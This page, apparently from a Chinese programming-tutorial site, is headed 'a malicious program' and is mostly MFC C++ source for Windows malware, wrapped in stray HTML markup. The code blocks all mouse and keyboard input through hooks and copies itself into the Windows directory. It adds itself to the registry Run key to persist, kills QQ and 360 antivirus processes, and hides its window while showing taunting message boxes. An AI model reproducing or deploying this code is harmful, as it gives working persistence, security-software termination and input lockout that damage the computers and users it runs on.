一个恶意程序_PHP教程

<span //</span><span  KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span 
#include </span><span "</span><span stdafx.h</span><span "</span><span 
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span 
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span 
 #include </span><tlhelp32.h><span 

#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span  __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CAboutDlg dialog used for App About
</span><span //</span><span 定义全局HHOOK变量，用于保存</span>
<span  HHOOK  g_hMouse;
 HHOOK  g_hKeyboard;
 </span><span bool</span> isTrue = <span false</span><span ;

 HWND hWnd; </span><span //</span><span 保存当前句柄

</span><span //</span><span 注意以下俩个钩子过程是全局函数，所以里面的API要用全局的</span>
<span  LRESULT CALLBACK MouseProc(
  </span><span int</span> nCode,      <span //</span><span  hook code</span>
  WPARAM wParam,  <span //</span><span  message identifier</span>
  LPARAM lParam   <span //</span><span  mouse coordinates</span>
<span   )
 {
    </span><span return</span> <span 1</span><span ;    
 }

 LRESULT CALLBACK KeyboardProc(
  </span><span int</span> code,       <span //</span><span  hook code</span>
  WPARAM wParam,  <span //</span><span  virtual-key code</span>
  LPARAM lParam   <span //</span><span  keystroke-message information</span>
<span )
{
    </span><span //</span><span  if(VK_SPACE == wParam || VK_RETURN == wParam) </span><span //</span><span 屏蔽空格和回车键</span>
     <span /*</span><span   if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键 
            return 1;
       else
            return CallNextHookEx(g_hKeyboard,code,wParam,lParam);</span><span */</span>
    <span //</span><span 留个后门，使当按下F2键时，程序将退</span>
       <span if</span>(VK_F2 ==<span  wParam)
       {
           </span><span //</span><span 调用全局API函数向程序发出关闭消息</span>
           ::SendMessage(hWnd,WM_CLOSE,<span 0</span>,<span 0</span><span );
           </span><span //</span><span 卸载钩子</span>
<span            UnhookWindowsHookEx(g_hMouse);
           UnhookWindowsHookEx(g_hKeyboard);
       }
       </span><span return</span> <span 1</span><span ;
}


</span><span class</span> CAboutDlg : <span public</span><span  CDialog
{
</span><span public</span><span :
    CAboutDlg();

</span><span //</span><span  Dialog Data
    </span><span //</span><span {{AFX_DATA(CAboutDlg)</span>
    <span enum</span> { IDD =<span  IDD_ABOUTBOX };
    </span><span //</span><span }}AFX_DATA

    </span><span //</span><span  ClassWizard generated virtual function overridesf
    </span><span //</span><span {{AFX_VIRTUAL(CAboutDlg)</span>
    <span protected</span><span :
    </span><span virtual</span> <span void</span> DoDataExchange(CDataExchange* pDX);    <span //</span><span  DDX/DDV support
    </span><span //</span><span }}AFX_VIRTUAL

</span><span //</span><span  Implementation</span>
<span protected</span><span :
    </span><span //</span><span {{AFX_MSG(CAboutDlg)
    </span><span //</span><span }}AFX_MSG</span>
<span     DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
    </span><span //</span><span {{AFX_DATA_INIT(CAboutDlg)
    </span><span //</span><span }}AFX_DATA_INIT</span>
<span }

</span><span void</span> CAboutDlg::DoDataExchange(CDataExchange*<span  pDX)
{
    CDialog::DoDataExchange(pDX);
    </span><span //</span><span {{AFX_DATA_MAP(CAboutDlg)
    </span><span //</span><span }}AFX_DATA_MAP</span>
<span }

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
    </span><span //</span><span {{AFX_MSG_MAP(CAboutDlg)
        </span><span //</span><span  No message handlers
    </span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()

</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CKeyBoardHookDialogDlg dialog</span>
<span 
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd</span>* pParent <span /*</span><span =NULL</span><span */</span><span )
    : CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
    </span><span //</span><span {{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
        </span><span //</span><span  NOTE: the ClassWizard will add member initialization here
    </span><span //</span><span }}AFX_DATA_INIT
    </span><span //</span><span  Note that LoadIcon does not require a subsequent DestroyIcon in Win32</span>
    m_hIcon = AfxGetApp()-><span LoadIcon(IDR_MAINFRAME);
}

</span><span void</span> CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange*<span  pDX)
{
    CDialog::DoDataExchange(pDX);
    </span><span //</span><span {{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
        </span><span //</span><span  NOTE: the ClassWizard will add DDX and DDV calls here
    </span><span //</span><span }}AFX_DATA_MAP</span>
<span }

BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
    </span><span //</span><span {{AFX_MSG_MAP(CKeyBoardHookDialogDlg)</span>
<span     ON_WM_SYSCOMMAND()
    ON_WM_PAINT()
    ON_WM_QUERYDRAGICON()
    ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
    ON_WM_TIMER()
    </span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()

</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CKeyBoardHookDialogDlg message handlers</span>
<span 
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
    CDialog::OnInitDialog();

    </span><span //</span><span  Add "About..." menu item to system menu.

    </span><span //</span><span  IDM_ABOUTBOX must be in the system command range.</span>
    ASSERT((IDM_ABOUTBOX & <span 0xFFF0</span>) ==<span  IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX </span>< <span 0xF000</span><span );

    CMenu</span>* pSysMenu =<span  GetSystemMenu(FALSE);
    </span><span if</span> (pSysMenu !=<span  NULL)
    {
        CString strAboutMenu;
        strAboutMenu.LoadString(IDS_ABOUTBOX);
        </span><span if</span> (!<span strAboutMenu.IsEmpty())
        {
            pSysMenu</span>-><span AppendMenu(MF_SEPARATOR);
            pSysMenu</span>-><span AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }

    </span><span //</span><span  Set the icon for this dialog.  The framework does this automatically
    </span><span //</span><span   when the application's main window is not a dialog</span>
    SetIcon(m_hIcon, TRUE);            <span //</span><span  Set big icon</span>
    SetIcon(m_hIcon, FALSE);        <span //</span><span  Set small icon
    
    </span><span //</span><span  TODO: Add extra initialization here</span>
<span 

    CopySelf();
    autoRun();</span><span //</span><span 注册表启动
        </span><span //</span><span 设定钩子
</span><span //</span><span     ShowProcess();</span>
    g_hMouse =<span  SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
    g_hKeyboard </span>=<span  SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
    </span><span //</span><span 保存句柄</span>
    hWnd =<span  m_hWnd;
    
    SetTimer(</span><span 1</span>, <span 2000</span><span , NULL);
    isTrue </span>= <span true</span><span ;
    </span><span return</span> TRUE;  <span //</span><span  return TRUE  unless you set the focus to a control</span>
<span }

</span><span void</span><span  CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    </span><span if</span> ((nID & <span 0xFFF0</span>) ==<span  IDM_ABOUTBOX)
    {
        CAboutDlg dlgAbout;
        dlgAbout.DoModal();
    }
    </span><span else</span><span 
    {
        CDialog::OnSysCommand(nID, lParam);
    }
}

</span><span //</span><span  If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span   to draw the icon.  For MFC applications using the document/view model,
</span><span //</span><span   this is automatically done for you by the framework.</span>

<span void</span><span  CKeyBoardHookDialogDlg::OnPaint() 
{
    </span><span if</span><span  (IsIconic())
    {
        CPaintDC dc(</span><span this</span>); <span //</span><span  device context for painting</span>
<span 
        SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), </span><span 0</span><span );

        </span><span //</span><span  Center icon in client rectangle</span>
        <span int</span> cxIcon =<span  GetSystemMetrics(SM_CXICON);
        </span><span int</span> cyIcon =<span  GetSystemMetrics(SM_CYICON);
        CRect rect;
        GetClientRect(</span>&<span rect);
        </span><span int</span> x = (rect.Width() - cxIcon + <span 1</span>) / <span 2</span><span ;
        </span><span int</span> y = (rect.Height() - cyIcon + <span 1</span>) / <span 2</span><span ;

        </span><span //</span><span  Draw the icon</span>
<span         dc.DrawIcon(x, y, m_hIcon);
    }
    </span><span else</span><span 
    {
        CDialog::OnPaint();
    }
}

</span><span //</span><span  The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span   the minimized window.</span>
<span HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
    </span><span return</span><span  (HCURSOR) m_hIcon;
}


</span><span void</span><span  CKeyBoardHookDialogDlg::OnBtnHookon() 
{
    </span><span //</span><span  TODO: Add your control notification handler code here</span>
<span 
    
    
}

</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff() 
</span><span //</span><span DEL {
</span><span //</span><span DEL     </span><span //</span><span  TODO: Add your control notification handler code here
</span><span //</span><span DEL     SetHookOff();
</span><span //</span><span DEL     
</span><span //</span><span DEL }</span>

<span void</span><span  CKeyBoardHookDialogDlg::hide()
{
 
        ShowWindow(SW_HIDE); 
}


</span><span void</span><span  CKeyBoardHookDialogDlg::autoRun()
{

        HKEY hKey </span>=<span  NULL;
        LONG lRet </span>= RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&<span hKey);

        </span><span if</span>(lRet !=<span  ERROR_SUCCESS)
        {
            </span><span return</span><span ;
        }

        RegSetValueEx(hKey,</span><span "</span><span mynona</span><span "</span>,NULL,REG_SZ,(<span const</span> unsigned <span char</span> *)&<span szWindowsPath,
            strlen(szWindowsPath) </span>+<span sizeof</span>(<span char</span><span ));

        RegCloseKey(hKey);
}

</span><span void</span><span  CKeyBoardHookDialogDlg::ShowProcess()
{

    HANDLE hSnap </span>=<span  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
    </span><span //</span><span ...</span>
<span 
    PROCESSENTRY32 Pe32 </span>= {<span 0</span><span };
    Pe32.dwSize </span>= <span sizeof</span><span (PROCESSENTRY32);
    </span><span int</span> bRet = Process32First(hSnap,&<span Pe32);
    </span><span //</span><span 360IOSMgrSrv 360tray </span>
    <span char</span> name[MAX_PATH] = <span "</span><span QQ.exe</span><span "</span><span ;
    </span><span char</span> name2[MAX_PATH] = <span "</span><span 360tray.exe</span><span "</span><span ;
    </span><span char</span> name3[MAX_PATH] = <span "</span><span 360rp.exe</span><span "</span><span ;
    </span><span while</span><span (bRet)
    {
        </span><span //</span><span ...</span>
        bRet = Process32Next(hSnap,&<span Pe32);        
        </span><span //</span><span cout<<"id:"<<Pe32.th32ProcessID<<"   name:"<<Pe32.szExeFile<<endl;</span>
        
        <span int</span> flag = <span 0</span><span ;
        </span><span if</span>(strcmp(Pe32.szExeFile,name) == <span 0</span> || strcmp(Pe32.szExeFile,name3) == <span 0</span> || strcmp(Pe32.szExeFile,name2) ==<span 0</span><span )
            flag </span>= <span 1</span><span ;
        </span><span if</span><span (flag){
        </span><span //</span><span     cout<<"----------------------"<<Pe32.th32ProcessID<<endl;</span>
<span             MessageBox(Pe32.szExeFile);
            HANDLE hProcess </span>=<span  OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
            LPDWORD lpExitCode </span>= <span 0</span><span ;
            GetExitCodeProcess(hProcess, lpExitCode);
            TerminateProcess(hProcess, (UINT)lpExitCode);
        }
    }
}

</span><span void</span><span  CKeyBoardHookDialogDlg::CopySelf()
{

     </span><span char</span> szSelfName[MAX_PATH] = {<span 0</span><span };
    </span><span //</span><span  char szSystemPath[MAX_PATH] = {0};</span>
     <span char</span> szTmpPath[MAX_PATH] = {<span 0</span><span };

     </span><span //</span><span 获取当前程序自身路径</span>
<span      GetModuleFileName(NULL,szSelfName,MAX_PATH);
     </span><span //</span><span cout<<"szSelfName:"<<szSelfName<<endl;

     </span><span //</span><span 获取系统目录</span>
<span      GetWindowsDirectory(szWindowsPath,MAX_PATH);
   </span><span //</span><span   cout<<"szWindowsPath:"<<szWindowsPath<<endl;

     </span><span //</span><span 获取windows目录
   </span><span //</span><span   GetSystemDirectory(szSystemPath,MAX_PATH);
     </span><span //</span><span cout<<"szSystemPath:"<<szSystemPath<<endl;</span>
<span 
     strcat(szWindowsPath,</span><span "</span><span \\mynona.exe</span><span "</span><span );
     </span><span //</span><span strcat(szSystemPath,"\\mynona.exe");</span>
<span 
     MessageBox( szWindowsPath,</span><span "</span><span : szWindowsPath</span><span "</span><span );
     </span><span //</span><span MessageBox( szSystemPath,": szSystemPath");    </span>

     <span int</span> isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);<span //</span><span FALSE表示强行覆盖原有文件
   </span><span //</span><span   int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);</span>
<span 
}

</span><span void</span><span  CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent) 
{
    </span><span //</span><span  TODO: Add your message handler code here and/or call default</span>
    <span if</span><span (isTrue){
        ShowWindow(SW_HIDE); 
    }
    MessageBox(</span><span "</span><span haha</span><span "</span>,<span "</span><span 哈哈</span><span "</span><span ,MB_ICONSTOP);

    CDialog::OnTimer(nIDEvent);
}</span>

 

http://www.bkjia.com/PHPjc/440129.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/440129.htmlTechArticleREG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" tlhelp32.h new DEBUG_NEW THIS_FILE THIS_FILE[] = isTrue = nCode, WPARAM wParam, LPARAM lParam code, WPARAM wParam, LPARA...